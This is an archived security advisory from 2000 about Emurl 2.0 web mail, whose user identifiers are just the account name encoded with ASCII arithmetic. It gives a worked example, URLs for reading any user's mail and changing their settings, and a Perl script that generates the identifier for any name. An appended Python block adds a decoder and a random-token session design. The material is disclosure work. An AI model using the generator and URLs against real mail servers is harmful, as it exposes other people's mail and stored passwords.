Subject: Vulnerability in EMURL-based e-mail providers
From: Pierre Benoit (pbenoitMAIL.COM)
Date: Mon May 15 2000 - 11:33:23 CDT


Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)

Product information: Emurl is a web-based e-mail host developed by SeattleLab.
http://www1.seattlelab.com/emurl/

Impact: Any user can read the mailbox contents of any other user on the system.
They can also obtain that user's POP passwords, since Emurl allows an account to
fetch POP e-mail from more than one source.

Description:
After logging into my new mail account powered by the Emurl software, this
URL struck me:

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123

I guess you all know where this is going. First, this identifier is based
solely on your account name. Therefore, if you create an account with the
same name on another site, you'll end up with the very same identifier.

Furthermore, this identifier is easily determined, since it is "encoded" by
taking the ASCII value of each character of the (lowercased) account name,
adding that character's 1-based position, and concatenating the results.

In this example, my user ID would be PBenoit and my resulting identifier
would be 113100104114116111123.

p = 112 + 1 = 113
b = 98 + 2 = 100
e = 101 + 3 = 104
n = 110 + 4 = 114
o = 111 + 5 = 116
i = 105 + 6 = 111
t = 116 + 7 = 123

You could fetch the e-mails here

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=>

... and view/change the account's settings here

http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=>

I threw a few lines of Perl together to generate this.

#!/usr/bin/perl
use strict;
use warnings;

print "Enter your ID: ";
my $id = lc(<STDIN>);    # the identifier is computed on the lowercased name
chomp $id;
print "Your identifier is: ";
my @letters = split(//, $id);
for (my $i = 0; $i < length($id); $i++) {
    # ASCII value of the character plus its 1-based position
    my $mychar = ord($letters[$i]) + $i + 1;
    # zero-pad to three digits so each character occupies a fixed-width group
    if ($mychar < 100) { $mychar = "0" . $mychar; }
    print $mychar;
}
print "\n";
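As an added illustration (not code from the advisory or from SeattleLab), the following Python reimplements the encoding described above, shows that it is trivially invertible (so the USER value carries no secret and cannot serve as authentication), and contrasts it with a server-side session store that hands out random tokens; the SessionStore class and its method names are assumptions for the example.

```python
import secrets
from typing import Dict, Optional

def emurl_identifier(username: str) -> str:
    """Rebuild the Emurl USER identifier as the advisory describes it:
    lowercase the name, then for each character emit ord(char) + 1-based
    position as a three-digit, zero-padded group."""
    groups = []
    for pos, ch in enumerate(username.lower(), start=1):
        groups.append(f"{ord(ch) + pos:03d}")
    return "".join(groups)

def decode_emurl_identifier(identifier: str) -> str:
    """The scheme is deterministic and has no key, so it reverses directly:
    subtract the position from each three-digit group. Assumes every group
    is exactly three digits (true for printable ASCII at normal name lengths)."""
    if len(identifier) % 3:
        raise ValueError("identifier length must be a multiple of 3")
    chars = []
    for i in range(0, len(identifier), 3):
        pos = i // 3 + 1
        chars.append(chr(int(identifier[i:i + 3]) - pos))
    return "".join(chars)

class SessionStore:
    """Hardened alternative (assumed design, not Emurl's): the URL carries a
    random, unguessable token, and the token -> account mapping lives only on
    the server. Knowing someone's account name yields nothing usable."""
    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}

    def login(self, username: str) -> str:
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[token] = username
        return token

    def resolve(self, token: str) -> Optional[str]:
        return self._sessions.get(token)

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)

if __name__ == "__main__":
    ident = emurl_identifier("PBenoit")           # constructed sample name
    print(ident, decode_emurl_identifier(ident))
    store = SessionStore()
    print(store.resolve(store.login("pbenoit")))
```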

Vendor status: SeattleLab is aware and the issue is addressed in their next
version.
